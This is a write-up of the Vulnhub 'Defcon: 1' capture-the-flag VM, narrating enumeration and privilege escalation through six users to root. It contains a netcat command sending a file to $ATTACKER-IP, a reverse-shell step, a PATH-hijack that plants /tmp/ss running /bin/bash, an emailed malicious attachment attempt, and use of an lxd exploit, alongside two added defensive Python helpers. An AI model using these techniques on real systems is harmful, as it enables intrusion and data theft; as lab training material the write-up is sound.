Defcon: 1 Vulnhub Write-up

Babak

Welcome to the agency! Here we look only for the best of the best.

Do you think you got what it takes? Then step up and show us what you got!

This is a Boot2Root challenge. The final goal is to take the flag in /root.

This VM is created and tested with VMWare, but Vbox also should work just fine.

To begin with, the challenge was pretty intense. Usually a challenge requires privilege escalation through one or two users. In this case we have six users to escalate through before you get to root.

The machine requires a lot of enumeration and patience. So let's begin…

As always, I ran netdiscover to find the IP on my network and started the nmap scan.

Four open ports.

Before we go over to the enumeration part, let's have a look at the VM itself:

Starting the VM, some usernames are already revealed. Good to have during the enumeration part.

From the nmap output we have SSH, HTTP and port 222 open. Some vulnerabilities exist for the service on port 222: if you search for "berkeley rshd with spx auth" you will find some interesting information, but for now let's enumerate the HTTP ports.

Starting the enumeration with port 80.

All I found with dirsearch was this:

Let's run curl to see what that backup file contains.

Renaming the backup file to index.html and opening it with Firefox:

Not much here!

Looking at the web page, you can find some encrypted lines where it says your challenge starts here. There are three different puzzles.

For the first puzzle I found a page where I could decrypt the cipher:

Running Google Translate and letting it automatically detect the language:

Translation: an instrument that has been published in Egypt, so let it go deeper, you will not get a message

That clue led nowhere and neither did the other puzzles, but it was still fun to play with those ciphers. Let's see if Nikto finds anything interesting.

Running Nikto reveals that the hostname does not match the certificate's name:

It's a good idea to take a look at the certificate and see if we can find any useful information.

Now I have a subdomain name and a username. It looks like an email address.

The first thing to do is to add all the domain names to the /etc/hosts file so I can enumerate the services by their DNS names instead of the IP.

Browsing to the web page, there is a robots.txt:

I tried this string as a file name and as a password for ssh, but there was nothing to find.

If we go back to the main page again, we will see that some kind of command is running with some output.

Waiting for the end of the message, I found something that looks like Morse code.

Looks like there is a WordPress page.

It is possible to perform user enumeration:

With user enumeration you can figure out if the application is using any default usernames.

Now that I know there is a WordPress page, I can fire up wpscan to enumerate the web site, although I already have a username and password.

Found the valid username with wpscan.

If you encounter issues like wpscan not being able to run, you probably need to upgrade the tool. You can find more info here. In your Kali terminal run: gem update wpscan

Also, to be able to scan the web site you need to tell wpscan to skip the TLS certificate check with this command: wpscan --url https://nsa-xxxx.net/ --disable-tls-checks

There was also a db config file which was found by wpscan:

If there were other users, I should be able to find them with wpscan and also perform a brute force attack with the same tool, but since that username was the only valid one, let's log in to the page:

First I did some research on SimTerm, but the only interesting plugin was WPTerm, so I used WPTerm and clicked on terminal:

Logged in as Graham!

Access granted to the first user. I'm now able to run commands, so the first thing to do is to create a reverse shell to enumerate the machine. Running nc to get a shell:

The tricky part here is that I have a lot of usernames and need to figure out whom I should escalate to first…

The first thing I did was to log in to that db and see if there is any useful information. There is one table with a username.

Found the username and password hash.

There are some files you will find during the enumeration, and if you pay attention to one of them you will see that something sticks out: the capital letters.

I put the letters together and used it for authentication and it worked to login as that user.

Cool! Access granted to the second user…

Since the default SSH port is not working, the only way to escalate to this user is by running su USERNAME.

User 3:

Enumerating this user's privileges, I found out that the user is allowed to run a sudo command without providing any password:

This user is allowed to use systemctl to start ssh. I ran netstat to see what happens before and after I run that sudo command. The default SSH port is not usable for some reason; I think it is whitelisted for specific IP addresses. Let's look at the netstat outputs:

Before running the command!

Let's connect to that port.

Now I can ssh to the machine with this command:

ssh USERNAME@HOSTNAME -p 222

Poking around this user's home folder, I found a file called secret.png. Running strings didn't give me much, so I transferred the file to my machine.

File transfer can be done with netcat. In your machine start nc listener:

nc -l -p $PORT > file.png

In victim machine run:

nc -w 3 $ATTACKER-IP $ATTACKER-PORT < file.png

Examining the file with hexdump:

hexdump -C secret.png | less:

Wrong header!

Before running hexdump I tried to open the file but got an error. So let's change the header to .PNG with bless and see if it works this time:

You should also be able to enter the header as TEXT if you don't have the hex!

Comparing the two files, now the secret2.png is a valid PNG file!

Nice! This string looks like a password…
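As an added example (not part of the original write-up and not from the challenge VM), here is a small Python checker that does what the hexdump and bless steps above do by hand: it tests the 8-byte PNG signature, parses the IHDR chunk and verifies its CRC to confirm the rest of the file is intact, and rewrites only the signature. The 1x1 sample image and its copy with an overwritten header are constructed in make_sample; no real file from the machine is used.

```python
import struct
import zlib
from typing import Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # the 8 magic bytes every PNG starts with


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def png_status(data: bytes) -> dict:
    """Report whether `data` has a valid PNG signature and a sane IHDR chunk.

    The IHDR check matters because a file whose signature is wrong but whose
    first chunk and CRC are intact is a candidate for a header-only repair.
    """
    result = {"signature_ok": data[:8] == PNG_SIGNATURE, "ihdr_ok": False,
              "crc_ok": False, "width": None, "height": None}
    if len(data) < 8 + 8 + 13 + 4:  # signature + chunk header + IHDR body + CRC
        return result
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype == b"IHDR" and length == 13:
        result["ihdr_ok"] = True
        body = data[16:29]
        stored_crc = struct.unpack(">I", data[29:33])[0]
        result["crc_ok"] = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored_crc
        result["width"], result["height"] = struct.unpack(">II", body[:8])
    return result


def repair_signature(data: bytes) -> bytes:
    """Return a copy of `data` with the first 8 bytes replaced by the PNG signature.

    Only the signature is rewritten; chunk data is untouched, which is exactly
    what editing the header in a hex editor does.
    """
    if len(data) < 8:
        raise ValueError("file shorter than a PNG signature")
    return PNG_SIGNATURE + data[8:]


def repair_file(src: str, dst: str) -> dict:
    """Repair the signature of the file at `src`, write it to `dst`, return its status."""
    with open(src, "rb") as fh:
        fixed = repair_signature(fh.read())
    with open(dst, "wb") as fh:
        fh.write(fixed)
    return png_status(fixed)


def make_sample() -> Tuple[bytes, bytes]:
    """Constructed test data: a valid 1x1 grayscale PNG and a copy with a bad header."""
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = _chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
    iend = _chunk(b"IEND", b"")
    good = PNG_SIGNATURE + ihdr + idat + iend
    bad = b"XXXXXXXX" + good[8:]  # signature overwritten, everything else intact
    return good, bad


if __name__ == "__main__":
    good, bad = make_sample()
    print("before:", png_status(bad))
    print("after: ", png_status(repair_signature(bad)))
```

The useful signal here is the combination "signature_ok is False, ihdr_ok and crc_ok are True": the file was damaged only at the front, so replacing the header is enough. If the CRC also fails, more than the header has been changed and a header fix alone will not make the image viewable.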

I already have two users and this one is the third user I need to escalate to. The solution is simple:

Try all the remaining usernames to ssh with that password:

Running sudo -l, I can see that even this user is allowed to run a privileged command as another user (not as root) without providing a password:

I can open another shell with “vi” as another user!

User 4:

User 5:

The user's home directory contains a file called check, owned by root.

I can either analyze the file on the victim machine or transfer it to my host.

Looks like when the file gets executed, the output resembles netstat's output.

Running the file with ltrace, it looks like it is executing the "ss" command.

You can find more info about ss here.

The ss command gets executed without its full path. Let's exploit it by providing another path containing a malicious file with the same name.

Create a new file named ss in /tmp, make it executable and put /tmp first in the PATH:

touch /tmp/ss

echo "/bin/bash" >> /tmp/ss

chmod +x /tmp/ss

export PATH=/tmp:$PATH

Executing the file gave me shell as next user!
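As an added illustration (not the author's code and not from the challenge VM), the following Python models the weakness just described from the defender's side: it resolves a command name the way execvp does, flags a result that lives outside trusted directories or is writable by others, and shows the hardened way a privileged helper should call ss, by absolute path with a PATH it sets itself rather than inherits. The two temporary directories, the echo scripts standing in for ss, and the TRUSTED_DIRS list are constructed assumptions.

```python
import os
import stat
import subprocess
import tempfile
from typing import Optional, Sequence

# Directories a privileged helper should accept a command from. Assumption: a
# typical Debian/Ubuntu layout; adjust for the system under review.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve(cmd: str, path: str) -> Optional[str]:
    """Return the file `cmd` resolves to under `path`, searching left to right like execvp."""
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        if directory and os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def is_trusted(binary: str, trusted_dirs: Sequence[str] = TRUSTED_DIRS) -> bool:
    """True only if `binary` lives in a trusted directory and is not group/world writable."""
    real = os.path.realpath(binary)
    trusted = {os.path.realpath(d) for d in trusted_dirs}
    if os.path.dirname(real) not in trusted:
        return False
    return not os.stat(real).st_mode & (stat.S_IWGRP | stat.S_IWOTH)


def run_fixed(binary: str, args: Sequence[str] = (),
              trusted_dirs: Sequence[str] = TRUSTED_DIRS) -> str:
    """Hardened invocation: absolute path, and a PATH the caller controls rather than inherits."""
    if not os.path.isabs(binary):
        raise ValueError("privileged helpers must call commands by absolute path")
    env = {"PATH": os.pathsep.join(trusted_dirs)}
    proc = subprocess.run([binary, *args], env=env, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def _write_script(path: str, body: str) -> None:
    """Write a tiny executable shell script (constructed stand-in for a real binary)."""
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o755)


def demo() -> dict:
    """Constructed scenario: a writable directory placed first in PATH shadows the real ss."""
    with tempfile.TemporaryDirectory() as root:
        system = os.path.join(root, "system")      # stands in for /usr/sbin
        writable = os.path.join(root, "writable")  # stands in for /tmp
        os.makedirs(system)
        os.makedirs(writable)
        _write_script(os.path.join(system, "ss"), "echo real-ss")
        _write_script(os.path.join(writable, "ss"), "echo shadowed")
        inherited_path = os.pathsep.join([writable, system])

        # What `check` effectively does: look up a bare name in the caller's PATH.
        resolved = resolve("ss", inherited_path)
        return {
            "resolved_in": os.path.basename(os.path.dirname(resolved)),
            "resolved_trusted": is_trusted(resolved, (system,)),
            "real_trusted": is_trusted(os.path.join(system, "ss"), (system,)),
            # What it should do: absolute path plus its own PATH, regardless of the caller's.
            "fixed_output": run_fixed(os.path.join(system, "ss"), trusted_dirs=(system,)),
        }


if __name__ == "__main__":
    print(demo())
```

The same resolve/is_trusted pair can be pointed at a real PATH value captured from a suspicious process to see which file a bare command name would actually have run; the fix on the program side is the one run_fixed shows, and on the sudo side the secure_path option serves the same purpose.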

User 6:

The fifth user's home directory contains several directories, one of which contains that user's password. There is also a directory called .vnc. Usually when you configure VNC, a password has to be provided during the configuration, and a file with that password (encrypted) gets created. I was able to find that password and decrypt it.

I tried to figure out the reason for that vnc directory and whether some other user or service is using that password. But that was not the case.

I went back to some other users and tried to run the vnc command. I was able to configure vnc and got the same directories after the configuration as my current user, so maybe that was not there for any specific reason!?

I also connected to the remote desktop with vnc (just type nautilus in the terminal), but there was nothing more than what I already had access to.

….

During the enumeration I found that some users are able to send and read emails, and it seems like this specific user is reading others' emails.

That indicates to me that maybe this user is reading my emails, and perhaps if I attach a malicious file, it will get executed by that user.

To be able to send email in linux terminal you can run:

mail -s "SUBJECT" user@domain.com -A /tmp/executablefile.sh

I could see that the users I'm targeting are getting the emails, but nothing happens, so I decided to keep enumerating elsewhere.

Also, since port 25 is open, I tried to see if I can enumerate SMTP by accessing the port with nc:

nc localhost 25

No authentication is enabled, which means I'm not able to enumerate it further.

What else is left to enumerate!!!

Each time I escalate to a new user, I run the netstat command to see if there are new services running to exploit.
For every user I manage to take over I notice that port 3306 is open. Also, for each user whose credentials I got, I connected to the db to see if there is any interesting information in their database.

So I connected to my current user's db and there is some interesting information:

The user table contains several usernames and the corresponding hashes.

The sixth user's password was retrieved and I'm able to ssh to the machine as this last user.

Hmm no sudo -l :)

Root:

Let's enumerate for root…

The first thing I see in this user's home folder is some files which indicate that there should be something with lxd.

I've seen privilege escalation with lxd before and tried to run exploit.sh:

Looking at exploit.sh and lxd-exploit.sh, they are the same files as the ones on GitHub to exploit lxd.

The first thing to do to confirm the lxd vulnerability is of course to run the lxd command, but it looks like bash does not recognise it:

The lxd binary was not found, so let's see if it's hidden somewhere else:

Running:

find / -type f -name lxd -print

Changing directory to /snap/bin, I found some executable binaries:

And now I'm able to play with the container:

When I tried to run lxd it was not found, but after exporting /snap/bin to the user's PATH I was able to run the exploit.

If you run exploit.sh you won't be able to escalate to root, but the other file works fine:

And I'm able to run sudo commands to list the /root directory:

Rooted!

Thanks and I hope you enjoyed this challenge!